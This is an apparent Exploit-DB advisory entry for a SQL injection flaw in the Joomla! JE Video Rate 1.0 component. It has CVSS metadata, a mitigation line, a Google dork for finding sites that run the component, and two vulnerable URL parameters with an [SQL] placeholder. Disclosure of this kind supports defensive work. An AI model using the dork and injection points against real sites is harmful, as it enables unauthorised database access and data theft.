Joomla! Component JE Video Rate 1.0 - SQL Injection

vendor:

JE Video Rate

by:

Ihsan Sencan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: JE Video Rate

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:joomlaextension.biz:jevideorate:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Joomla! Component JE Video Rate 1.0 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component JE Video Rate 1.0. An attacker can send malicious SQL queries to the application, allowing them to bypass authentication and gain access to unauthorized data. The vulnerability is due to insufficient input validation in the application when handling user-supplied data.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component JE Video Rate 1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_jevideorate
# Date: 13.02.2017
# Vendor Homepage: http://www.joomlaextension.biz/
# Software Buy: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-video-rate/
# Demo: http://www.joomlaextension.biz/demo/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video&cat_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video_detail&id=[SQL]
# # # # #